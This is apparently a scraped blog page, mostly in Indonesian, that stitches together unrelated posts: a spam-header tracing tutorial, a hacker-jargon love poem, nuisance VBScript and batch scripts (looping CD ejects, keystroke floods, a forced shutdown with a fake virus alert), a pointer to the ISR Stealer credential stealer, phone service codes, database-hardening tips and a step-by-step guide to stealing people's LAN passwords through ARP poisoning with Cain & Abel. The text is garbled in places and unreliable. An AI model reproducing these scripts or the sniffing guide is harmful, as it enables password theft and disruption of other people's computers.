FVCK SACENK

.
Ask most people how they determine who sent them an email message and the response is almost universally, “By the From line.” Unfortunately this symptomatic of the current confusion among internet users as to where particular messages come from and who is spreading spam and viruses. The “From” header is little more than a courtesy to the person receiving the message. People spreading spam and viruses are rarely courteous. In short, if there is any question about where a particular email message came from the safe bet is to assume the “From” header is forged.

So how do you determine where a message actually came from? You have to understand how email messages are put together in order to backtrack an email message. SMTP is a text based protocol for transferring messages across the internet. A series of headers are placed in front of the data portion of the message. By examining the headers you can usually backtrack a message to the source network, sometimes the source host. A more detailed essay on reading email headers can be found .

If you are using Outlook or Outlook Express you can view the headers by right clicking on the message and selecting properties or options.

Below are listed the headers of an actual spam message I received. I’ve changed my email address and the name of my server for obvious reasons. I’ve also double spaced the headers to make them more readable.

Return-Path: < s359dyxtt@yahoo.com>

X-Original-To: davar@example.com

Delivered-To: davar@example.com

Received: from 12-218-172-108.client.mchsi.com (12-218-172-108.client.mchsi.com [12.218.172.108])

by mailhost.example.com (Postfix) with SMTP id 1F9B8511C7

for < davar@example.com>; Sun, 16 Nov 2003 09:50:37 -0800 (PST)

Received: from (HELO 0udjou) [193.12.169.0] by 12-218-172-108.client.mchsi.com with ESMTP id <536806-74276>; Sun, 16 Nov 2003 19:42:31  0200

Message-ID:

From: “Maricela Paulson” < s359dyxtt@yahoo.com>

Reply-To: “Maricela Paulson” < s359dyxtt@yahoo.com>

To: davar@example.com

Subject: STOP-PAYING For Your PAY-PER-VIEW, Movie Channels, Mature Channels…isha

Date: Sun, 16 Nov 2003 19:42:31  0200

X-Mailer: Internet Mail Service (5.5.2650.21)

X-Priority: 3

MIME-Version: 1.0

Content-Type: multipart/alternative; boundary=”MIMEStream=_0 211404_90873633350646_4032088448″

According to the From header this message is from Maricela Paulson at s359dyxxt@yahoo.com. I could just fire off a message to abuse@yahoo.com, but that would be waste of time. This message didn’t come from yahoo’s email service.

The header most likely to be useful in determining the actual source of an email message is the Received header. According to the top-most Received header this message was received from the host 12-218-172-108.client.mchsi.com with the ip address of 21.218.172.108 by my server mailhost.example.com. An important item to consider is at what point in the chain does the email system become untrusted? I consider anything beyond my own email server to be an unreliable source of information. Because this header was generated by my email server it is reasonable for me to accept it at face value.

The next Received header (which is chronologically the first) shows the remote email server accepting the message from the host 0udjou with the ip 193.12.169.0. Those of you who know anything about IP will realize that that is not a valid host IP address. In addition, any hostname that ends in client.mchsi.com is unlikely to be an authorized email server. This has every sign of being a cracked client system.

Here’s is where we start digging. By default Windows is somewhat lacking in network diagnostic tools; however, you can use the tools at to do your own checking.

davar@nqh9k:[/home/davar] $whois 12.218.172.108

AT&T WorldNet Services ATT (NET-12-0-0-0-1)

12.0.0.0 – 12.255.255.255

Mediacom Communications Corp MEDIACOMCC-12-218-168-0-FLANDREAU-MN (NET-12-218-168-0-1)

12.218.168.0 – 12.218.175.255

# ARIN WHOIS database, last updated 2003-12-31 19:15

# Enter ? for additional hints on searching ARIN’s WHOIS database.

I can also verify the hostname of the remote server by using nslookup, although in this particular instance, my email server has already provided both the IP address and the hostname.

davar@nqh9k:[/home/davar] $nslookup 12.218.172.108

Server: localhost

Address: 127.0.0.1

Name: 12-218-172-108.client.mchsi.com

Address: 12.218.172.108

Ok, whois shows that Mediacom Communications owns that netblock and nslookup confirms the address to hostname mapping of the remote server,12-218-172-108.client.mchsi.com. If I preface a www in front of the domain name portion and plug that into my web browser, http://www.mchsi.com, I get Mediacom’s web site.

There are few things more embarrassing to me than firing off an angry message to someone who is supposedly responsible for a problem, and being wrong. By double checking who owns the remote host’s IP address using two different tools (whois and nslookup) I minimize the chance of making myself look like an idiot.

A quick glance at the web site and it appears they are an ISP. Now if I copy the entire message including the headers into a new email message and send it to abuse@mchsi.com with a short message explaining the situation, they may do something about it.

But what about Maricela Paulson? There really is no way to determine who sent a message, the best you can hope for is to find out what host sent it. Even in the case of a PGP signed messages there is no guarantee that one particular person actually pressed the send button. Obviously determining who the actual sender of an email message is much more involved than reading the From header. Hopefully this example may be of some use to other forum regulars.

Seandainya hatimu adalah sebuah system, maka aku akan scan kamu untuk mengetahui port mana yang terbuka Sehingga tidak ada keraguan saat aku c:\> nc -l -o -v -e ke hatimu,tapi aku hanya berani ping di belakang anonymouse proxy, inikah rasanya jatuh cinta sehingga membuatku seperti pecundang atau aku memang pecundang sejati whatever!
Seandainya hatimu adalah sebuah system, ingin rasanya aku manfaatkan vulnerabilitiesmu, pake PHP injection Terus aku ls -la; find / -perm 777 -type d,sehingga aku tau kalo di hatimu ada folder yang bisa ditulisi atau adakah free space buat aku?. apa aku harus pasang backdor “Remote Connect-Back Shell”jadi aku tinggal nunggu koneksi dari kamu saja, biar aku tidak merana seperti ini.
Seandainya hatimu adalah sebuah system, saat semua request-ku diterima aku akan nogkrong terus di bugtraq untuk mengetahui bug terbarumu maka aku akan patch n pacth terus,aku akan jaga service-mu jangan sampai crash n aku akan menjadi firewallmu aku akan pasang portsentry, dan menyeting error pagemu ” The page cannot be found Coz Has Been Owned by Someone get out!” aku janji gak bakalan ada macelinious program atau service yang hidden, karena aku sangat sayang dan mencintaimu.
Seandainya hatimu adalah sebuah system, jangan ada kata “You dont have permission to access it” untuk aku, kalau ga mau di ping flood Atau DDos Attack jangan ah….! kamu harus menjadi sang bidadari penyelamatku.
Seandainya hatimu adalah sebuah system, …?
Tapi sayang hatimu bukanlah sebuah system, kamu adalah sang bidadari impianku, yang telah mengacaukan systemku! Suatu saat nanti aku akan datang n mengatakan kalau di hatiku sudah terinfeksi virus yang Menghanyutkan, Ga ada anti virus yang dapat menangkalnya selain …kamu.

saya akan memberikan sedikit tutorial buat nge hack semoga bermanfaat bismillah

pertama. download tools nya ISR stealer unduh skrg : di sini

1. Iseng Mengeject CD-Drive Terus Menerus

Quote:Set oWMP = CreateObject(�WMPlayer.OCX.7?)
Set colCDROMs = oWMP.cdromCollection
do
if colCDROMs.Count >= 1 then
For i = 0 to colCDROMs.Count � 1
colCDROMs.Item(i).Eject
Next
For i = 0 to colCDROMs.Count � 1
colCDROMs.Item(i).Eject
Next
End If
wscript.sleep 5000
loop

Quote:Set wshShell = wscript.CreateObject(�WScript.Shell�)
do
wscript.sleep 100
wshshell.sendkeys �~(enter)�
loop

Quote:WScript.Sleep 180000
WScript.Sleep 10000
Set WshShell = WScript.CreateObject(�WScript.Shell�)
WshShell.Run �notepad�
WScript.Sleep 100
WshShell.AppActivate �Notepad�
WScript.Sleep 500
WshShell.SendKeys �Hel�
WScript.Sleep 500
WshShell.SendKeys �lo �
WScript.Sleep 500
WshShell.SendKeys �, ho�
WScript.Sleep 500
WshShell.SendKeys �w a�
WScript.Sleep 500
WshShell.SendKeys �re �
WScript.Sleep 500
WshShell.SendKeys �you�
WScript.Sleep 500
WshShell.SendKeys �? �
WScript.Sleep 500
WshShell.SendKeys �I a�
WScript.Sleep 500
WshShell.SendKeys �m g�
WScript.Sleep 500
WshShell.SendKeys �ood�
WScript.Sleep 500
WshShell.SendKeys � th�
WScript.Sleep 500
WshShell.SendKeys �ank�
WScript.Sleep 500
WshShell.SendKeys �s! �

Quote:MsgBox �Maaf, Anda Harus Mengulang Kembali�
Set wshShell =wscript.CreateObject(�WScript.Shell�)
do
wscript.sleep 100
wshshell.sendkeys �{bs}�
loop

Quote:@ECHO off
:top
START %SystemRoot%\system32\cacl.exe
GOTO top

Quote:Set wshShell = wscript.CreateObject(�WScript.Shell�)
do
wscript.sleep 100
wshshell.sendkeys �Maaf, Keyboard Tidak Berfungsi! Harap Diperbaiki�
loop

Quote:@echo off
msg * Komputer Anda Terinfeksi Virus
shutdown -c �Error! Virus Menyebar Keseluruh System!� -s -t 0

1.Nessus

“Nessus” pertama kali dibuat oleh Renaud Deraison pada tahun 1998 dan disebarkan untuk komunitas internet secara bebas, bermanfaat, ter-update dengan baik serta mudah untuk digunakan.
Nessus adalah sebuah program untuk mencari kelemahan pada sebuah sistem komputer. Menurut situs resminya di http://www.nessus.org, tool ini telah digunakan oleh lebih dari 75.000 organisasi dan perusahaan di seluruh dunia.

2.Snort

Snort adalah sebuah IDS, yaitu tool untuk mencegah dan mendeteksi serangan terhadap sistem komputer. Vendor dari snort mengklaim bahwa tool ini telah didownload berjuta-juta kali dari situs mereka. Anda mungkin berminat untuk mencobanya, silahkan download tool ini di http://www.snort.org.

3.Kismet

Kismet adalah sebuah tool untuk mendeteksi koneksi wireless(mendukung lalu lintas 802.11b, 802.11a, dan 802.11g ) , menangkap paket dalam sebuah sistem jaringan dan menjadi sebuah IDS (intrusion detection System).
Untuk mencari tahu lebih lanjut mengenai kismet, anda dapat mengunjungi situs http://www.kismetwireless.net atau masuk ke #kismet irc.freenode.net.

4.Metasploit Framework

Metasploit Framework adalah sebuah proyek open source untuk mengembangkan, menguji dan menggunakan kode eksploit. Dibuat dengan bahasa Perl sebagai fondasi dasar dan dan terdiri dari komponen pelengkap yang telah dicompile dengan bahasa C, assembler dan Python. Metasploit Framework dapat berjalan pada sistem operasi UNIX, Linux dan Windows. Keterangan yang lebih detail dapat anda cari di http://www.metasploit.com

5.Netcat

Netcat adalah sebuah tool networking utility yang dapat membaca dan menulis data pada koneksi sebuah jaringan melalui protokol TCP/IP.
Fitur yang terdapat pada Netcat antara lain :
• Koneksi keluar dan masuk melalui protokol UDP ataupun TCP dengan port yang digunakan..
• Tunneling mode, tunneling dari UDP ke TCP, memetakan parameter dalam jaringan (source port/interface, listening port/interface, dan mengijinkan remote host melakukan koneksi ke tunnel)
• Port scanner, untuk mendeteksi port yang terbuka.
• Buffered send-mode dan hexdump RFC854 telnet.
6.Hping

Hping merupakan sebuah tool serba guna. Tool ini dapat digunakan untuk menguji kemampuan firewall, mencari port yang terbuka, menguji keamanan jaringan dengan menggunakan berbagai jenis protokol, mendapatkan informasi sistem operasi, mengevaluasi protokol TCP/IP.

7.TCPDump

Tcpdump juga merupakan sebuah sniffer. Admin jaringan menggunakan tool ini untuk memonitor lalu lintas dan menganalisa permasalahan jika terjadi gangguan. Menurut informasi di http://www-iepm.slac.stanford.edu/monito...pdump.html , Tcpdump menggunakan paket filter dari UNIX BSD untuk meng-capture data(BPF / BSD Packet Filter).BPF menerima salinan dari driver pengirim dan penerima paket.Pengguna tcpdump juga dapat menyaring paket sesuai dengan keinginan.

8. John The Ripper

Sebuah password cracker dari jaman nenek moyang para hacker yang masih menjadi 10 besar tool favorit. Berikut adalah keterangan dari pembuat John The Ripper.
“John the Ripper is a password cracker, currently available for UNIX, DOS,WinNT/Win95. Its primary purpose is to detect weak UNIX passwords. It has been tested with Linux x86/Alpha/SPARC, FreeBSD x86, OpenBSD x86, Solaris 2.x SPARC and x86, Digital UNIX, AIX, HP-UX, and IRIX”.

9. Cain And Abel

Cain & Abel adalah sebuah tool untuk masalah password. Tool ini dapat mengumpulkan password dengan metode network sniffing, meng-crack password menggunakan Dictionary attack, Brute-Force and Cryptanalysis attacks, merekam pembicaraan VoIP (Voice Over Internet Protocol), meng-crack jaringan wireless, menganalisa trafik dalam jaringan. http://www.oxid.it

10. WireShark / Ethereal

Wireshark / Ethereal adalah sebuah tool untuk menganalisa protokol jaringan. Fungsinya juga sebagai sebuah sniffer. Memantau lalu lintas internet. Wireshark
dapat berjalan pada Windows, MAC OS X, dan Linux. http://www.wireshark.org
Tertarik? Pelajari dan pahami saja cara penggunaan 10 tool tsb. Kita memang tdk akan semudah itu menjadi hacker hebat hanya dengan mengandalkan 10 tool diatas. Tapi tool2 tsb sudah diakui oleh semua tingkatan Hacker. Kan bisa menjadi tambahan bagi anda2 yang ingin menggeluti sekuriti komputer secara mendalam.

Berikut terdapat kode-kode rahasia pada GSM nokia, sony ericson, Samsung,Motorola ,Philips, LG,Benq-Siemens, panasonic dan alcatel.
Tetapi ada beberapa kode yang hanya bisa dipakai oleh ponsel tertentu saja.

Nokia
1. *#06# Menampilkan nomor IMEI (International Mobile Equipment Identity).
2. *#7370# atau *#RESO# Mereset ke setingan awal (pabrikan), data-data akan terhapus.
3. *#7780# atau *#rst0* Mereset ke setingan awal (pabrikan), data-data tidak akan terhapus.
4. *#0000# Menampilkan versi firmware.
5. *#9999# Merupakan alternatif jika kode *#0000# tidak berfungsi.
6. *#8110# Menampilkan versi firmware (Nokia 8110).
7. *#21# Melihat pengalihan untuk semua panggilan ‘All calls’.
8. **21*nomor tujuan# Mengalihkan panggilan ke nomor yang dituju untuk semua panggilan.
9. **61*nomor tujuan# Mengalihkan panggilan ke nomor yang dituju untuk panggilan yang tidak terjawab.
10. **67*nomor tujuan# Mengalihkan panggilan ke nomor yang dituju untuk panggilan ketika sedang sibuk.
11. *#61# Melihat nomor pengalihan karena tidak dijawab ‘Call divert’.
12. *#62# Melihat nomor pengalihan karena diluar jangkauan ‘Call divert’ dan mengetahui kemana nomor tersebut dialihkan.
13. *#67# Melihat nomor pengalihan karena sibuk ‘Call divert’ dan mengetahui kemana nomor tersebut dialihkan.
14. *#2820# Menampilkan alamat IP Bluetooth.
15. *#30# Menampilkan nomor pribadi.
16. *#43# Melihat status ‘Call waiting’.
17. *#62209526# atau *#MACOWLAN Menampilkan alamat MAC WLAN.
18. *#67705646# Mengganti operator logo (tipe 3310, 3330).
19. *#73# Mereset timer ponsel dan skor game.
20. *#746025625# Menampilkan status SIM Clock. Jika ponsel anda mendukung fungsi power saving akan muncul tulisan “SIM Clock Stop Allowed”, itu berarti anda bisa mendapatkan waktu terbaik untuk standby.
21. *#7760# Menampilkan kode pabrik/produk.
22. *#92702689# atau *#war0anty# Menampilkan nomor serial, tanggal pembuatan, tanggal pembelian, tanggal terakhir servis (000 jika belum pernah diperbaiki) dan transfer user data. Pada beberapa ponsel setelah menggunakan kode ini anda harus merestart ponsel.
23. *#2640# Menampilkan kode pengamanan ponsel.
24. *#3370# Mengaktifkan EFR (Full Rate Codec), kualitas suara terbaik namun pemakaian baterai menjadi boros.
25. #3370# Untuk menonaktifkan EFR.
26. *#4720# Mengaktifkan Half Rate Codec, kualitas suara terendah namun pemakaian baterai menjadi lebih hemat.
27. #4720# Untuk menonaktifkan Half Rate Codec.
28. 10# Cara cepat untuk membuka nomor kontak yang tersimpan di kartu SIM berdasarkan nomor urut. Contoh angka 10 adalah nomor urut kontak.
29. #pw+1234567890+1# Mengunci status provider, gunakan tanda “*” untuk memisahkan antara “p,w” dan tanda “+”.
30. #pw+1234567890+1# Mengunci status provider, gunakan tanda “*” untuk memisahkan antara “p,w” dan tanda “+”.
31. #pw+1234567890+2# Mengunci status network, gunakan tanda “*” untuk memisahkan antara “p,w” dan tanda “+”.
32. #pw+1234567890+3# Mengunci status country, gunakan tanda “*” untuk memisahkan antara “p,w” dan tanda “+”.
33. #pw+1234567890+4# Mengunci status kartu SIM, gunakan tanda “*” untuk memisahkan antara “p,w” dan tanda “+”

Sony Ericsson
1. *#06# Menampilkan nomor IMEI (International Mobile Equipment Identity).
2. *#0000# atau 0000 Mereset kembali ke bahasa inggris.
3. >*<<*<* Melihat service menu dan versi software. Tekan tombol Yes berulang kali untuk melihat semua data software dan tekan > untuk melihat semua teks yang terdapat pada ponsel.
4. <**<> 4. *#337*# Mengaktifkan/menonaktifkan

Database dewasa ini berpasangan sangat erat dengan aplikasi-aplikasi web. Kegunaannya pun beragam, mulai dari menyimpan nama-nama user, password, hingga menyimpan no kartu kredit (ingat khan artikel yang Spyro posting mengenai tehnik carding dengan meng-crack file database).
Tapi sayangnya, keamanan database kerap kali diabaikan dan dianggap sebagai hal yang tidak terlalu membutuhkan perlindungan keamanan. Hal ini bisa disimpulkan dari sekian banyaknya artikel yang membahas tentang metode-metode srangan terhadap database. Padahal, kebocoran informasi-informasi yang ada pada database bisa berdampak fatal dan kerugian besar. Berikut ini beberapa cara untuk pencegahan serangan terhadap database anda:
1.      Rajin mengupdate Patch
Sesegera mungkin downloadlah dan instal patch-patch terbaru yang tersedia. Biasanya, baik untuk Microsoft ataupun Oracle, patch-patch diedarkan secara reguler. Namunjangan lupa untuk melakukan pengujian terlebih dahulu. Perlu diingat bahwa anda harus melakukan pengujian pada system mirror, jangan pada system yang sebenarnya.
2.      Konfigurasi Firewall
Terapkan aturan-aturan firewall yang ketat. Pastikan anda memeriksanya secara rutin dan berkala. Selalu blok port untuk akses-akses database seperti TCP dan UDP 1434 (MS SQL) dan TCP 1521-1530 (Oracle)
3.      Sanitasi (Penyaringan Input)
Anda harus mensanitasi input yang diterima dari user. Selalu periksa data-data yang diterima dan periksa tipenya (integer, string, dst..). Anda harus memotong karakter-karakter yang tidak diinginkan, misalnya saja meta karakter.
4.      Membuang Stored Procedure
Pastikan anda telah membuang semua stored procedure (termasuk extended stored procedure) dari keseluruhan database, tanpa terkecuali master. Script-script yang tidak berbahaya tersebut bisa saja menjadi penumbang database yang paling aman sekalipun.
5.      Penggunaan Stored Procedure
Jika memungkinkan, gunakan kode SQL yang sudah digunakan ke dalam sebuah stored procedure. Hal ini akan membatasi kode SQL yang perlu diatur dalam file ASP dan mengurangi exploitasi serangan terhadap validasi input.
6.      Enkripsi Session
Jika server database anda terpisah dari web server, pastikan anda mengenkripsi session dengan beberapa cara, misalnya saj menggunakan IPSec built in pada windows 2000.
7.      Hak-Hak Khusus
Pastikan (dan kalo bisa selalu) terapkan sesedikit mungkin hak-hak akses. Jangan menggunakan “sa” untuk mengakses file-file database.
Semoga artikel ini bermanfaat bagi anda!!!!

cma mau bagi2 ilmu, info, n pngalaman…
mungkin sudah banyak yang tau ada sudah coba tutorial ini,.
Bagi gw pribadi, make linux di usb sangat bermanfaat, kyak :
1. Free atawa gratis, ga perlu ribet ma aktivasi n kita gag make sofware bajakan.

2. Bisa untuk menyelamatkan file di Drive C [drive default system nya wind**s], misal ada file system yg korup ato terjangkit virus dan harus di install ulang… padahal banyak dokumen yang penting disana, jadi harus diselamatkan, kita bisa pake linux yg di booting dari usb, simple en hampir sebagian besar sudah di support oleh komputer zaman sekarang.
3. Bisa di pake untuk bersihin virus… (bagi yang sudah expert di bidang virus
4. Portable, bisa di bawa kemana2.
5. Gag perlu driver, slama gw pake di usb, dari LM 4, 5, 6, 7 dan terakhir 8, semua driver kompie terbaca, bisa LAN, Bluetooth, VGA, dll
6. Fitur dalam 1 distro lengkap, dari office smpe game, gag perlu install lagi.
7. dll dach..

cara untuk bisa install en jalanin distro ini di flashdisk:

Cara hacking via LAN (untuk curi pass orang2 yang lagi browsing)

Pertama-tama sorry kalo repost karena teknik ini bukanlah teknik yang fresh di dunia hacking tapi teknik ini belum basi karena sampai saat ini masih dapat digunakan karena sebagian besar jaringan meggunakan jaringan hub & switch yang tidak terenkripsi.
Mengapa tidak terenkripsi?

* Network Admin sebagian besar adalah orang IT yang specialist dalam membuat program, bukan dalam Network Security
* Bila dienkripsi bandwidth yang dibuthkan akan meningkat dan tentu inet yang sudah lemot ini akan semakin lemot dan akhirnya page error
* Harganya tidak murah untuk memperoleh yang terenkripsi

Perbedaan antara jaringan Hub dan Switch:

* Pada jaringan hub semua data yang mengalir di jaringan dapat dilihat/diambil oleh komputer manapun yang ada di jaringan asalakan komputer tersebut merequest data tersebut, kalo tidak direquest ya tidak akan datang.
* Pada jaringan switch hanya komputer yang melakukan pertukaran data yang dapat melihat data tersebut, komputer2 lain tidak berhak merequest data tersebut.

Masalahnya adalah harga dari router hub dan switch tidak berbeda jauh sehingga kebanyakan tempat sekarang sudah menggunakan metode switch yang menyulitkan untuk network hacking.

Hacking ini menggunakan teknik:

* Sniffing
* ARP Poison Routing

Kedua Teknik di atas tidak akan bisa dicegah oleh firewall apapun di komputer korban, dijamin.

Important Note: ARP Poison Routing dapat meyebabkan denial of service (dos) pada salah satu / semua komputer pada network anda

Kelebihan:

* Tidak akan terdeteksi oleh firewall tipe dan seri apapun karena kelemahannya terletak pada sistem jaringan bukan pada komputernya
* Bisa mencuri semua jenis login password yang melalui server HTTP
* Bisa mencuri semua login password orang yang ada di jaringan Hub selama program diaktifkan
* Untuk ARP Poisoning bisa digunakan untuk mencuri password di HTTPS
* Semua programnya free

Kekurangan:

* Untuk jaringan Switch harus di ARP poisoning 1 persatu dan bandwidth anda akan termakan banyak untuk hal itu (kalo inet super cepat ga masalah)
* Ketahuan / tidak oleh admin jaringan di luar tanggung jawab saya

Mulai dari sini anggap bahwa di network dalam kisah ini ada 3 komputer, yaitu:

* Komputer Korban
* Komputer Hacker
* Server

Perbedaan-perbedaan antara jaringan switch dan jaringan hub:
Langkah-langkah pertama:

1. Cek tipe jaringan anda, anda ada di jaringan switch / hub. Jika anda berada di jaringan hub bersyukurlah karena proses hacking anda akan jauh lebih mudah.
2. Download program-program yang dibutuhkan yaitu Wireshark dan Cain&Abel.
Code:

http://www.wireshark.org/download.html
http://www.oxid.it/cain.html



Cara Menggunakan WireShark:

* Jalankan program wireshark
* Tekan tombol Ctrl+k (klik capture lalu option)
* Pastikan isi pada Interfacenya adalah Ethernet Card anda yang menuju ke jaringan, bila bukan ganti dan pastikan pula bahwa “Capture packets in promiscuous mode” on
* Klik tombol start
* Klik tombol stop setelah anda merasa yakin bahwa ada password yang masuk selama anda menekan tombol start
* Anda bisa melihat semua jenis packet yang masuk dan keluar di jaringan (atau pada komputer anda saja jika network anda menggunakan Swtich
* Untuk menganalisis datanya klik kanan pada data yang ingin di analisis lalu klik “Follow TCP Stream” dan selamat menganalisis paketnya (saya tidak akan menjelaskan caranya karena saya tidak bisa )
* Yang jelas dari data itu pasti di dalamnya terdapat informasi2 yang dimasukkan korban ke website dan sebaliknya

Cara di atas hanya berlaku apabila jaringan anda adalah Hub bukan switch
Dari cara di atas anda dapat mengetahui bahwa jaringan anda adalah hub/switch dengan melihat pada kolom IP Source dan IP Destination. Bila pada setiap baris salah satu dari keduanya merupakan ip anda maka dapat dipastikan jaringan anda adalah jaringan switch, bila tidak ya berarti sebaliknya.

Cara Menggunakan Cain&Abel:

* Penggunaan program ini jauh lebih mudah dan simple daripada menggunakan wireshark, tetapi bila anda menginginkan semua packet yang sudah keluar dan masuk disarankan anda menggunakan program wireshark
* Buka program Cain anda
* Klik pada bagian configure
* Pada bagian “Sniffer” pilih ethernet card yang akan anda gunakan
* Pada bagian “HTTP Fields” anda harus menambahkan username fields dan password fields nya apabila yang anda inginkan tidak ada di daftar.
Sebagai contoh saya akan beritahukan bahwa kalo anda mau hack password Friendster anda harus menambahkan di username fields dan passworsd fields kata name, untuk yang lain anda bisa mencarinya dengan menekan klik kanan view source dan anda harus mencari variabel input dari login dan password website tersebut. Yang sudah ada di defaultnya rasanyan sudah cukup lengkap, anda dapat mencuri pass yang ada di klubmentari tanpa menambah apapun.
* Setelah itu apply settingannya dan klik ok
* Di menu utama terdapat 8 tab, dan yang akan dibahas hanya 1 tab yaitu tab “Sniffer” karena itu pilih lah tab tersebut dan jangan pindah2 dari tab tersebut untuk mencegah kebingungan anda sendiri
* Aktifkan Sniffer dengan cara klik tombol sniffer yang ada di atas tab2 tersebut, carilah tombol yang tulisannya “Start/Stop Sniffer”
* Bila anda ada di jaringan hub saat ini anda sudah bisa mengetahui password yang masuk dengan cara klik tab (Kali ini tab yang ada di bawah bukan yang di tengah, yang ditengah sudah tidak usah diklik-klik lagi) “Passwords”
* Anda tinggal memilih password dari koneksi mana yang ingin anda lihat akan sudah terdaftar di sana
* Bila anda ternyata ada di jaringan switch, ini membutuhkan perjuangan lebih, anda harus mengaktifkan APR yang tombolonya ada di sebelah kanan Sniffer (Dan ini tidak dijamin berhasil karena manage dari switch jauh lebih lengkap&secure dari hub)
* Sebelum diaktifkan pada tab sniffer yang bagian bawah pilih APR
* Akan terlihat 2 buah list yang masih kosong, klik list kosong bagian atas kemudian klik tombol “+” (Bentuknya seperti itu) yang ada di jajaran tombol sniffer APR dll
* Akan ada 2 buah field yang berisi semua host yang ada di jaringan anda
* Hubungkan antara alamat ip korban dan alamat ip gateway server (untuk mengetahui alamat gateway server klik start pada komp anda pilih run ketik cmd lalu ketik ipconfig pada command prompt)
* Setelah itu baru aktifkan APR, dan semua data dari komp korban ke server dapat anda lihat dengan cara yang sama.

Anda dapat menjalankan kedua program di atas secara bersamaan (Cain untuk APR dan wireshark untuk packet sniffing) bila ingin hasil yang lebih maksimal.

Password yang bisa anda curi adalah password yang ada di server HTTP (server yang tidak terenkripsi), bila data tersebut ada di server yang terenkripsi maka anda harus mendekripsi data tersebut sebelum memperoleh passwordnya (dan itu akan membutuhkan langkah2 yang jauh lebih panjang dari cara hack ini)

Untuk istilah-istilah yang tidak ngerti bisa dicari di wikipedia (tapi yang inggris ya kalo yang indo jg belum tentu ada).

Pernahkah anda mengalami rasa kesal terhadap lawan chatting anda,sehingga anda pengen mengerjainya?
Berikut ini saya tunjukkan cara mengerjai lawan chatting yang resek...trik ini juga dapat dilakukan untuk mengerjai sang penyusup yang mau nyuri data di komputer kita